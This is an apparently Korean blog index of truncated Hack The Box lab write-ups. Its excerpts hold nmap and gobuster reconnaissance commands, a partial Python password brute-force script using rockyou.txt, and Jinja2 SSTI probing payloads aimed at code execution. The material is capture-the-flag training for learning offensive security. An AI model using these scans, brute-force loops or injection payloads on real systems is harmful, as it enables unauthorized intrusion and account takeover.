Wargame
-
[HTB] Toxic WriteupWargame/Hack The Box 2023. 4. 21. 00:21
주어진 페이지에 접근해보자. 소스코드를 분석해보자. //index.php
-
[HTB] Inject WriteupWargame/Hack The Box 2023. 4. 19. 22:43
포트스캐닝을 통해 정보를 수집해보자. nmap -sC -sS -sV -p- -O -o scanResult.txt 10.129.176.111 22, 8080 port 가 open되어있었다. 해당 포트에 취약점이 있는지 확인해보자. nmap --script vuln 10.129.176.111 -p 22,8080 -o nmapVulnScanResult.txt -Pn 8080포트에는 아래와 같은 웹 서비스가 오픈되어 있었다. 디렉토리 나 경로 정보를 수집해보자. gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.129.176.111:8080/ -x .php,.html,.txt,.jsp -o gobu..
-
[HTB] Weather App WriteupWargame/Hack The Box 2023. 4. 7. 20:01
주어진 URL에 접근하면 아래와 같은 페이지가 나타난다. 주어진 소스코드를 보니 login, register 두 페이지가 있었다. 우선 플래그의 획득 조건은 admin 계정을 사용해서 로그인 하는 것이다. router.post('/login', (req, res) => { let { username, password } = req.body; if (username && password) { return db.isAdmin(username, password) .then(admin => { if (admin) return res.send(fs.readFileSync('/app/flag').toString()); return res.send(response('You are not admin')); }) .ca..
-
[HTB] Popcorn WriteupWargame/Hack The Box 2023. 3. 31. 01:28
스캐닝을 통해 정보를 수집해보자. nmap -sC -sS -sV -p- -O -o scanResult.txt 10.129.36.23 22, 80 포트가 오픈되어있음을 확인하여 추가적으로 취약점이 있나 확인해보았다. nmap --script vuln 10.129.36.23 -p 22,80 -o nmapVulnScanResult.txt -Pn /test 가 있다는 정보 외 다른 정보가 없어서, gobuster를 통해 추가 파일이나 디렉토리 정보를 찾아보았다. gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.129.36.23/ -x .php,.html,.txt -o gobusterResult.t..
-
[HTB] Phonebook WriteupWargame/Hack The Box 2023. 3. 28. 23:00
주어진 URL에 접근해보자. 별로 주어지는 정보가 없어, gobuster도 돌려보고, sqli도 시도해보고 등등 해봤지만, 수확이 없었다. 어쨌든 하단의 Reese로 부터 메시지가 있는 것으로 보아 Reese의 계정을 탈취해보기로 하고 Bruteforce 공격을 시도했다. import requests url = "http://167.172.52.160:31677/login" with open("/usr/share/wordlists/rockyou.txt","r",encoding='iso-8859-1') as file: for password in file: data = { "username": "Reese", "password": password } res = requests.post(url, data=d..
-
[HTB] Help WriteupWargame/Hack The Box 2023. 3. 16. 23:15
서버에 대한 정보를 획득하기 위해 포트 스캐닝을 해보았다. nmap -sC -sS -sV -p- -O -o scanResult.txt 10.129.227.176 22, 80, 3000 포트가 오픈되어있음을 확인했다. 해당 포트에서의 취약점 존재 여부를 1차적으로 확인해봤다. nmap --script vuln 10.129.227.176 -p 22,80,3000 -o nmapVulnScanResult.txt -Pn 80포트에는 apache2 디폴트 페이지가 있었다. 그리고 /support/ 에는 HelpDeskZ 라는 서비스가 오픈되어있었다. searchsploit HelpDeskZ 해당 서비스에 대해 알려진 취약점이 있는지 확인해보았다. 아래와 같이 두 건이 있었다. 우선 첫 번째 파일업로드 취약점의 내용..
-
[HTB] Templated WriteupWargame/Hack The Box 2023. 3. 14. 17:03
문제 URL을 방문해보자. 문제 이름 및 Flask/Jinja2를 사용한다는 점에서 SSTI 관련 문제임을 유추 할 수 있다. 별다른 기능이 없어보이므로 SSTI 공격을 시도하기 위한 다른 기능을 찾기 위해 다른 경로에 접근을 시도해보다가 입력한 경로 정보가 응답 값에 그대로 반영됨을 알 수 있었다. 따라서 경로 값으로 Jinja2에서의 SSTI 값을 입력하니 유효함을 확인 할 수 있었다. SSTI 공격을 통한 RCE를 위해 아래 과정을 거쳐 시도해보았다. {{ 7*7 }} #49 {{ ''.__class__ }} # {{ ''.__class__.__mro__ }} #(, ) {{ ''.__class__.__mro__[1].__subclasses__() }} #[, , , , , , , , , , , ,..